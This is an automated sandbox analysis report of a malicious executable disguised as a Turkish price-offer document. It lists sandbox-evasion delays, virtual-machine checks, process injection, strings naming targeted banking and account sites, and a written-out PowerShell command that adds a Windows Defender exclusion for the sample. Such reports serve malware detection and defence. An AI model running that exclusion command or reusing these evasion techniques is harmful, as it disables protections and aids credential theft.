                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -595985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -593985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599667Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599563Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599078Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598969Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 593985Jump to behavior
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1314351766.000000000771A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1314351766.000000000771A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2526422158.0000000000D86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 23qemu
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2536778400.0000000003ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 11_2_051B9548 LdrInitializeThunk,11_2_051B9548
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory written: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002D4D000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002D1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002D4D000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002D1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2529235604.0000000002D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerl
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
